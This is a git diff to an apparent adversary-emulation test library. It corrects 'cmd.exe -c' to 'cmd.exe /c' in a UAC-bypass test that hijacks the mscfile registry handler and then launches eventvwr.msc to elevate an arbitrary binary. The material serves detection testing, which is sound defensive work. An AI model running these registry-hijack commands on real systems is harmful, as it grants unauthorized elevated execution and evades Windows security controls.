diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
index c9351291..45b94964 100644
--- a/atomics/T1088/T1088.md
+++ b/atomics/T1088/T1088.md
@@ -37,7 +37,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
#### Run it with `command_prompt`!
```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
-cmd.exe -c eventvwr.msc
+cmd.exe /c eventvwr.msc
```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 5d70c721..317d95b1 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -4209,7 +4209,7 @@ defense-evasion:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
- cmd.exe -c eventvwr.msc
+ cmd.exe /c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
@@ -9592,7 +9592,7 @@ privilege-escalation:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
- cmd.exe -c eventvwr.msc
+ cmd.exe /c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/